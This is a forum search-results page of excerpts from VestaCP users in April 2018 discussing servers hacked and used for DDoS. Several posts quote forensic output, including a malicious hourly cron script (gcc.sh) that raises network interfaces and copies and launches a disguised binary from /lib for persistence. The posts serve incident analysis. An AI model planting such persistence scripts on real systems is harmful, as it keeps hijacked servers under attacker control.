We are happy to announce that Vesta is back under active development as of 25 February 2024. We are working on v1 candidate and expect to engage more with the community over the coming months. We are committed to open source, and we encourage contributors to help us build the future of Vesta.
Search found 33 matches
- Sun Apr 08, 2018 9:55 am
- Forum: General Discussion
- Topic: Got 10 VestaCP servers exploited
- Replies: 548
- Views: 709744
Re: Got 10 VestaCP servers exploited
A few more logs provided by the hosting support at the time when the server was active
[root@mail /]# lsof -p 985
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
update 985 root cwd DIR 182,178001 4096 786628 /usr/share/roundcubemail
update 985 root rtd DIR 182,178001 4096 2 /
update 985 root txt...
- Sat Apr 07, 2018 8:40 pm
- Forum: General Discussion
- Topic: Got 10 VestaCP servers exploited
- Replies: 548
- Views: 709744
Re: Got 10 VestaCP servers exploited
Moderators: please post instructions how to enable logging in all the web interfaces of Vesta (in nginx or Apache) so that those who find this thread after the hacking could temporarily change their configs of the web server and try to catch the requests from the exploit.
- Sat Apr 07, 2018 8:36 pm
- Forum: General Discussion
- Topic: Got 10 VestaCP servers exploited
- Replies: 548
- Views: 709744
Re: Got 10 VestaCP servers exploited
Just to think: when logging in through the web interface to Vesta, a session file should be created, right? And all of them are located in /usr/local/vesta/data/sessions. As I understand the web interface internals, PHP will check that we have "user" variable inside the session (https://github.com/serghe...
- Sat Apr 07, 2018 7:14 pm
- Forum: General Questions
- Topic: Possible vulnerability in Vesta 0.9.8.19
- Replies: 236
- Views: 141562
Re: Possible vulnerability in Vesta 0.9.8.19
Fighting the consequences is no longer as important as finding out the cause of the infection. And it is by no means a weak password.
Let's move to the related topic, there are more people with this problem there.
- Sat Apr 07, 2018 7:10 pm
- Forum: General Discussion
- Topic: Got 10 VestaCP servers exploited
- Replies: 548
- Views: 709744
Re: Got 10 VestaCP servers exploited
Those posts do explain the virus and its removal. But even after removal it will eventually reappear again because we are still not aware of a vuln which is obviously present somewhere within the system. Once again, I copy the answer from my hoster, which I posted in another topic: At the same time as th...
- Sat Apr 07, 2018 6:42 pm
- Forum: General Discussion
- Topic: Got 10 VestaCP servers exploited
- Replies: 548
- Views: 709744
Re: Got 10 VestaCP servers exploited
# cat /opt/backup/etc/cron.hourly/gcc.sh
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
# cat /opt/backup/etc/crontab ...
- Sat Apr 07, 2018 5:27 pm
- Forum: General Discussion
- Topic: Got 10 VestaCP servers exploited
- Replies: 548
- Views: 709744
Re: Got 10 VestaCP servers exploited
Found in /etc/cron.hourly/gcc.sh, modified 04.04.2018 16:25:00
More modified files at the same time:
/var/lib/mysql/roundcube/session.ibd
/etc/rc.d/rc3.d/S90update -> /etc/init.d/update
/etc/rc.d/rc2.d/S90update -> /etc/init.d/update
/etc/rc.d/rc1.d/S90update -> /etc/init.d/update
/etc/rc.d/init.d/...
- Sat Apr 07, 2018 5:03 pm
- Forum: General Discussion
- Topic: Got 10 VestaCP servers exploited
- Replies: 548
- Views: 709744
Re: Got 10 VestaCP servers exploited
Found in /etc/cron.hourly/gcc.sh, modified 04.04.2018 16:25:00
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
I did not...
- Sat Apr 07, 2018 3:58 pm
- Forum: General Discussion
- Topic: Got 10 VestaCP servers exploited
- Replies: 548
- Views: 709744
Re: Got 10 VestaCP servers exploited
Me too. I've created another thread (in Russian). But my provider is FastVPS, not OVH.
- Sat Apr 07, 2018 2:38 pm
- Forum: General Questions
- Topic: Possible vulnerability in Vesta 0.9.8.19
- Replies: 236
- Views: 141562
Possible vulnerability in Vesta 0.9.8.19
Hi everyone. Today I ran into a strange situation: my hoster blocked my VPS because of a DDoS against other resources. At first I did not understand what it was about and asked for details, and here is their answer (the hoster is FastVPS): Unfortunately, we have to inform you that the server was hacked and there was an outgoing network attack from it on oth...